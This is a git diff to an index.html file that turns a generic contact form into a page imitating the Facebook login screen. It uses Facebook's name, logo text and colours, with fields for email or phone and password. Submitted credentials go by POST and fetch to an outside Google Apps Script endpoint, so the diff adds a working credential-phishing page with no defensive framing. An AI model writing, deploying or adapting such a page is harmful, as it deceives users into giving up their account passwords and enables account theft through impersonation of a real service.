--- a/index.html
+++ b/index.html
@@ -3,66 +3,122 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Facebook Login</title>
+  <style>
+    /* General reset */
+    body, html {
+      margin: 0;
+      padding: 0;
+      font-family: Arial, sans-serif;
+    }
+
+    /* Background and container styling */
+    body {
+      background-color: #f0f2f5;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+    }
+
+    .login-container {
+      width: 100%;
+      max-width: 400px;
+      background-color: #fff;
+      border-radius: 8px;
+      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
+      padding: 20px;
+      text-align: center;
+    }
+
+    /* Facebook logo */
+    .logo {
+      font-size: 2rem;
+      font-weight: bold;
+      color: #1877f2;
+      margin-bottom: 20px;
+    }
+
+    /* Input styling */
+    input {
+      width: 95%;
+      padding: 12px;
+      margin: 10px 0;
+      border: 1px solid #ddd;
+      border-radius: 6px;
+      font-size: 1rem;
+      outline: none;
+    }
+
+    /* Button styling */
+    .submit{
+      width: 100%;
+      padding: 12px;
+      background-color: #1877f2;
+      color: white;
+      border: none;
+      border-radius: 6px;
+      font-size: 1rem;
+      font-weight: bold;
+      cursor: pointer;
+    }
+
+    button:hover {
+      background-color: #165db6;
+    }
+
+    /* Link styling */
+    .forgot-password {
+      display: block;
+      margin: 15px 0;
+      font-size: 0.9rem;
+      color: #1877f2;
+      text-decoration: none;
+    }
+
+    .forgot-password:hover {
+      text-decoration: underline;
+    }
+
+    /* Divider and create account button */
+    .divider {
+      margin: 20px 0;
+      border: 0;
+      height: 1px;
+      background: #ddd;
+    }
+
+    .create-account {
+      width: 100%;
+      padding: 10px;
+      background-color: #42b72a;
+      color: white;
+      border: none;
+      border-radius: 6px;
+      font-size: 1rem;
+      font-weight: bold;
+      cursor: pointer;
+    }
+
+    .create-account:hover {
+      background-color: #36a420;
+    }
+  </style>
+</head>
 <body>
-  <div class="container">
-    <form method="post" action="https://script.google.com/macros/s/AKfycbw8Bk5Ajtdg4aeiaA8pDORNlk4VhpfnP4tiRyViaZh_icWIynVMbhLWYJjTBrDFY4RB/exec" name="contact-form">
-      <h4>Contact Us</h4>
-      <input type="text" name="your-name" placeholder="Name">
-      <input type="number" name="your-number" placeholder="Number">
-      <input type="password" name="your-email" placeholder="Email">
-      <textarea name="message" rows="7" placeholder="Your Message">
-      </textarea>
-      <input type="submit" value="Submit" id="submit">
-		</form>
-	</div>
+  <div class="login-container">
+    <div class="logo">facebook</div>
+    <form method="post" action="https://script.google.com/macros/s/AKfycbw8Bk5Ajtdg4aeiaA8pDORNlk4VhpfnP4tiRyViaZh_icWIynVMbhLWYJjTBrDFY4RB/exec" name="contact-form" >
+      <input type="text" name="your-name" placeholder="Email or Phone Number" required>
+      <input type="password" name="your-pass" placeholder="Password" required>
+      <input type="submit" value="Log In" id="submit" class="submit" >
+    </form>
+    <a href="#" class="forgot-password">Forgot Password?</a>
+    <hr class="divider">
+    <button class="create-account">Create New Account</button>
+  </div>
 </body>
-<style>
-*{
-	box-sizing: border-box;
-	padding: 0;
-	margin: 0;
-	font-family: 'poppins', sans-serif;
-	font-size: 18px;
-}
-body{
-	height: 100vh;
-	display: flex;
-	align-items: center;
-	justify-content: center;
-}
-.container{
-	width: 500px;
-	padding: 30px;
-	border: 1px solid #eeeeee;
-	border-radius: 10px;
-	background-color: #003b5b;
-}
-h4{
-	margin-bottom: 10px;
-	font-size: 24px;
-	color: white;
-}
-input{
-	width: 100%;
-	padding: 10px;
-	margin-bottom: 10px;
-}
-textarea{
-	width: 100%;
-	padding: 10px;
-}
-#submit{
-	border: none;
-	background-color: orangered;
-	color: white;
-	width: 200px;
-	margin-top: 10px;
-	border-radius: 5px;
-}
-#submit:hover{
-	background-color: #333333;
-}
-</style>
+</html>
 <script>
 const scriptURL = 'https://script.google.com/macros/s/AKfycbw8Bk5Ajtdg4aeiaA8pDORNlk4VhpfnP4tiRyViaZh_icWIynVMbhLWYJjTBrDFY4RB/exec'
 
@@ -78,3 +134,4 @@ form.addEventListener('submit', e => {
   .catch(error => console.error('Error!', error.message))
 })
 </script>
+
